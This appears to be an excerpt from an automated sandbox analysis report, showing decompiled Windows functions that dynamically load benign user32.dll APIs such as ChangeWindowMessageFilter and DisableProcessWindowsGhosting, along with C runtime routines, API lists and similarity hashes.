                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E005C8644(void* __eax, void* __ecx) {
                                                            				void* __ebx;
                                                            				void* _t1;
                                                            				void* _t4;
                                                            				void* _t8;
                                                            				intOrPtr* _t9;
                                                            
                                                            				_t1 = __eax;
                                                            				_t4 = __eax;
                                                            				if( *0x6d57e8 == 0) {
                                                            					 *0x6d57ec = E00414020(_t4, _t8, GetModuleHandleW(L"user32.dll"), L"ChangeWindowMessageFilter");
                                                            					 *_t9 = 0x6d57e8;
                                                            					_t1 = 1;
                                                            					asm("lock xchg [edx], eax");
                                                            				}
                                                            				if( *0x6d57ec != 0) {
                                                            					_t1 =  *0x6d57ec(_t4, 1);
                                                            				}
                                                            				return _t1;
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                            • API String ID: 1646373207-2498399450
                                                            • Opcode ID: fef6738620f745ab1874efba3004544ff6482e169155c0e349f99ac77237f17e
                                                            • Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
                                                            • Opcode Fuzzy Hash: fef6738620f745ab1874efba3004544ff6482e169155c0e349f99ac77237f17e
                                                            • Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 44%
                                                            			E005C8820(void* __eax, void* __eflags) {
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				void* _t7;
                                                            				intOrPtr* _t8;
                                                            				void* _t9;
                                                            
                                                            				_t9 = __eax;
                                                            				_t8 = E00414020(_t7, _t9, GetModuleHandleW(L"user32.dll"), L"ShutdownBlockReasonDestroy");
                                                            				if(_t8 == 0) {
                                                            					L2:
                                                            					return 0;
                                                            				} else {
                                                            					_push(_t9);
                                                            					if( *_t8() != 0) {
                                                            						return 1;
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                            • API String ID: 1646373207-260599015
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E006B9800(void* __eflags) {
                                                            				intOrPtr* _t2;
                                                            				void* _t4;
                                                            				void* _t5;
                                                            
                                                            				_t2 = E00414020(_t4, _t5, GetModuleHandleW(L"user32.dll"), L"DisableProcessWindowsGhosting");
                                                            				if(_t2 != 0) {
                                                            					return  *_t2();
                                                            				}
                                                            				return _t2;
                                                            			}







                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                            • API String ID: 1646373207-834958232
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            APIs
                                                            • _free.LIBCMT ref: 6E2CDC01
                                                              • Part of subcall function 6E2DCF56: RtlFreeHeap.NTDLL(00000000,00000000,?,6E2CDC06,?,?,?,6E2C26C9,?), ref: 6E2DCF6C
                                                              • Part of subcall function 6E2DCF56: GetLastError.KERNEL32(?,?,6E2CDC06,?,?,?,6E2C26C9,?), ref: 6E2DCF7E
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.564125749.000000006E0F1000.00000020.00020000.sdmp, Offset: 6E0F0000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast_free
                                                            • String ID:
                                                            • API String ID: 1353095263-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E2BEC28,6E449ABC), ref: 6E2BEB0D
                                                            • UnhandledExceptionFilter.KERNEL32(6E2BEC28,?,6E2BEC28,6E449ABC), ref: 6E2BEB16
                                                            • GetCurrentProcess.KERNEL32(C0000409,?,6E2BEC28,6E449ABC), ref: 6E2BEB21
                                                            • TerminateProcess.KERNEL32(00000000,?,6E2BEC28,6E449ABC), ref: 6E2BEB28
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.564125749.000000006E0F1000.00000020.00020000.sdmp, Offset: 6E0F0000, based on PE: true
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                            • String ID:
                                                            • API String ID: 3231755760-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 6E2C2537
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6E2C253F
                                                            • _ValidateLocalCookies.LIBCMT ref: 6E2C25C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6E2C25F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 6E2C2648
                                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 6E2C265E
                                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6E2C2673
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.564125749.000000006E0F1000.00000020.00020000.sdmp, Offset: 6E0F0000, based on PE: true
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                            • String ID: csm
                                                            • API String ID: 1385549066-1018135373
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%